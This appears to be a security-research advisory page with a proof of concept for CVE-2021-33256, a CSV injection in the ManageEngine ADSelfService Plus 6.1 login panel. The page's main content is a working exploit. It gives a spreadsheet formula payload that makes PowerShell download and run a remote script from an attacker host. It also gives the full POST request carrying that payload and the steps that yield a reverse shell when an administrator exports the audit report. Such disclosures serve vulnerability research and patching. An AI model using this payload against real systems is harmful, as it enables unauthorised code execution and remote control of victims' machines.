UI
Search…
UI
ABOUT US
UNSAFE
INLINE
0DAY
Multiple ManageEngine Applications Critical Information Disclosure Vulnerability
Thecus N4800Eco Nas Server Control Panel Comand Injection
ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
BRAdmin Professional 3.75 - Unquoted Service Path
Powered By GitBook
ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
Obtain reverse shell in the domain environment exploiting CSV injection vulnerability

Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. j_username parameter seems to vulnerable and reverse shell could be obtained if privileged user exports "User Attempts Audit Report" as CSV file.
Payload:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0

Proof Of Concept

1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the above payload.
j_username parameter:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
POST Request:
POST /j_security_check HTTP/1.1
Host: 192.168.1.253:9251
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: https://192.168.1.253:9251
Connection: close
Referer: https://192.168.1.253:9251/j_security_check
Cookie: *
Upgrade-Insecure-Requests: 1
j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28
And the request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12
j_username parameter value is saved to "User Name" column which is start of line in the CSV file:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')'
2- Powershell command that sends reverse shell to attacker machine is embeded to last line of theInvoke-PowershellTcp.ps1 file.
3- If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user.
Exporting User Attempts Audit Report as CSV file
Confirmation for Starting Another Application
Exported CSV file
Getting Reverse Shell
NVD - CVE-2021-33256
ManageEngine ADSelfService Plus 6.1 - CSV Injection
Exploit Database

Reference

CSV Injection Software Attack | OWASP Foundation
nishang/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
GitHub
0DAY - Previous
Thecus N4800Eco Nas Server Control Panel Comand Injection
Next - 0DAY
Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
Last modified 1yr ago
Copy link
On this page
Description
Proof Of Concept
Reference